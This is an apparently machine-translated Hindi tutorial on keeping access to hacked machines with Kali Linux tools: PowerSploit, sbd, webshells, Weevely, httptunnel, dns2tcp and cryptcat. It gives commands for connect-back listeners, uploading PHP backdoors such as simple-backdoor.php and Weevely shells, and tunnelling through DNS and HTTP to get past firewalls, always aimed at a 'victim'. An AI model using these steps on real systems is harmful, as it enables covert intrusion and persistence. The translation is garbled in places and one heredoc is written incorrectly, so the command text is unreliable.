काली लिनक्स - पहुंच बनाए रखना
इस अध्याय में, हम उन उपकरणों को देखेंगे जो काली कनेक्शन को बनाए रखने के लिए उपयोग करते हैं और हैक की गई मशीन तक पहुंच के लिए भी जब यह कनेक्ट होता है और फिर से डिस्कनेक्ट होता है।
Powersploit
यह एक उपकरण है जो विंडोज मशीनों के लिए है। इसमें पीड़ित मशीन में पॉवरशेल लगाई गई है। यह टूल हैकर को पॉवरशेल के जरिए पीड़ित की मशीन से जुड़ने में मदद करता है।
इसे खोलने के लिए, बाईं ओर टर्मिनल खोलें और पावरप्लोइट फ़ोल्डर में प्रवेश करने के लिए निम्न कमांड टाइप करें -
cd /usr/share/powersploit/
यदि आप टाइप करते हैं “ls”यह उन सभी पॉवरप्लोइट टूल्स को सूचीबद्ध करेगा, जिन्हें आप एक्सेस करने के बाद पीड़ित की मशीन में डाउनलोड और इंस्टॉल कर सकते हैं। उनमें से अधिकांश अपने नाम के अनुसार स्व-स्पष्ट नाम हैं।
पीड़ित के मशीन पर इस टूल को डाउनलोड करने का एक आसान तरीका एक वेब सर्वर बनाना है, जिसे पावरप्लॉइट टूल निम्नलिखित कमांड का उपयोग करके आसानी से बनाने की अनुमति देता है -
python -m SimpleHTTPServer
इसके बाद, यदि आप टाइप करते हैं: http: // <काली मशीन ip_address>: 8000 / निम्नलिखित परिणाम है।
SBD
sbd Netcat के समान एक उपकरण है। यह पोर्टेबल है और इसका उपयोग लिनक्स और माइक्रोसॉफ्ट मशीनों में किया जा सकता है। sbd में AES-CBC-128 + HMAC-SHA1 एन्क्रिप्शन> मूल रूप से, यह किसी विशिष्ट पोर्ट पर किसी भी समय पीड़ित व्यक्ति की मशीन से कनेक्ट करने और दूरस्थ रूप से कमांड भेजने में मदद करता है।
इसे खोलने के लिए, टर्मिनल पर जाएं और टाइप करें “sbd -l -p port” कनेक्शन स्वीकार करने के लिए सर्वर के लिए।
इस मामले में, आइए हम पोर्ट 44 डालें जहां सर्वर सुनेंगे।
पीड़ित की साइट पर, टाइप करें “sbd IPofserver port”। एक कनेक्शन स्थापित किया जाएगा जहां हम दूरस्थ कमांड भेज सकते हैं।
इस मामले में, यह "लोकलहोस्ट" है क्योंकि हमने एक ही मशीन पर परीक्षण किया है।
अंत में, सर्वर पर आप देखेंगे कि निम्न स्क्रीनशॉट में दिखाया गया है।
Webshells
Webshells का उपयोग किसी वेबसाइट को एक्सेस या हैक करने के लिए किया जा सकता है। लेकिन उनमें से ज्यादातर का पता एंटीवायरस द्वारा लगाया जाता है। C99 php शेल एंटीवायरस के बीच बहुत अच्छी तरह से जाना जाता है। कोई भी सामान्य एंटीवायरस आसानी से मैलवेयर के रूप में इसका पता लगा लेगा।
आमतौर पर, उनका मुख्य कार्य वेब इंटरफेस के माध्यम से सिस्टम कमांड भेजना है।
इसे खोलने के लिए, और टाइप करें “cd /usr/share/webshells/” टर्मिनल में।
जैसा कि आप देख रहे हैं, उन्हें प्रोग्रामिंग भाषा के अनुसार कक्षाओं में विभाजित किया गया है: एस्प, एस्पेक्स, सीएफएम, जेएसपी, पेरिप, पीएचपी
यदि आप PHP फ़ोल्डर में प्रवेश करते हैं, तो आप php वेबपेजों के लिए सभी वेबस्पेल देख सकते हैं।
उदाहरण के लिए, वेब सर्वर पर शेल अपलोड करने के लिए “simple-backdoor.php” वेब शेल का वेबपेज और URL खोलें।
अंत में, cmd कमांड लिखें। आपके पास निम्न स्क्रीनशॉट में दिखाई गई सभी जानकारी होगी।
Weevely
Weevely एक PHP वेब शेल है जो टेलनेट-जैसे कनेक्शन का अनुकरण करता है। यह वेब एप्लिकेशन पोस्ट शोषण के लिए एक उपकरण है, और इसका उपयोग एक गुप्त बैकडोर के रूप में या वैध वेब खातों के प्रबंधन के लिए एक वेब शेल के रूप में किया जा सकता है, यहां तक कि मुफ्त होस्ट किए गए।
इसे खोलने के लिए, टर्मिनल पर जाएँ और “weevely” टाइप करें जहाँ आप इसका उपयोग देख सकते हैं।
शेल उत्पन्न करने के लिए, टाइप करें “weevely generate password pathoffile”। जैसा कि निम्नलिखित स्क्रीनशॉट में देखा गया है, यह "डेस्कटॉप" फ़ोल्डर में उत्पन्न होता है और फ़ाइल का उपयोग करने के लिए वेबसर्वर में अपलोड करना है।
निम्नलिखित स्क्रीनशॉट में दिखाए अनुसार वेब शेल अपलोड करने के बाद, हम कमांड का उपयोग करके सर्वर से cmd के साथ जुड़ सकते हैं “weevely URL password” जहां आप देख सकते हैं कि एक सत्र शुरू हो गया है।
http सुरंग
HTTP- सुरंग HTTP अनुरोधों में एक द्विदिश आभासी डेटा स्ट्रीम बनाता है। अनुरोधों को एक HTTP प्रॉक्सी के माध्यम से भेजा जा सकता है यदि ऐसा है तो। यह प्रतिबंधात्मक फ़ायरवॉल के पीछे उपयोगकर्ताओं के लिए उपयोगी हो सकता है। अगर HTTP प्रॉक्सी के माध्यम से WWW एक्सेस की अनुमति है, तो फ़ायरवॉल के बाहर कंप्यूटर से कनेक्ट करने के लिए http-tunnel और telnet या PPP का उपयोग करना संभव है।
सबसे पहले, हमें निम्नलिखित कमांड के साथ एक सुरंग सर्वर बनाना चाहिए -
httptunnel_server –h
फिर, क्लाइंट साइट प्रकार पर “httptunnel_client –h” और दोनों कनेक्शन स्वीकार करना शुरू कर देंगे।
dns2tcp
यह फिर से एक टनलिंग टूल है जो DNS ट्रैफ़िक के माध्यम से टीसीपी ट्रैफ़िक को पास करने में मदद करता है, जिसका अर्थ है यूडीपी 53 पोर्ट।
इसे शुरू करने के लिए, टाइप करें “dns2tcpd”। जब आप स्क्रिप्ट खोलेंगे तब उपयोग को समझाया गया है।
सर्वर साइट पर, फ़ाइल को कॉन्फ़िगर करने के लिए इस कमांड को दर्ज करें।
#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
क्लाइंट साइट पर, यह कमांड दर्ज करें।
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
इस कमांड से टनलिंग शुरू होगी।
cryptcat
यह Netcat जैसा एक अन्य उपकरण है जो एक पीड़ित के मशीन के साथ एन्क्रिप्टेड तरीके से टीसीपी और यूडीपी कनेक्शन बनाने की अनुमति देता है।
कनेक्शन सुनने के लिए सर्वर शुरू करने के लिए, निम्न कमांड टाइप करें -
cryptcat –l –p port –n
कहाँ पे,
-l एक कनेक्शन सुनने के लिए खड़ा है
-p पोर्ट नंबर पैरामीटर के लिए खड़ा है
-n नाम संकल्प नहीं करने के लिए खड़ा है
क्लाइंट साइट पर, कनेक्शन कमांड है “cryptcat IPofServer PortofServer”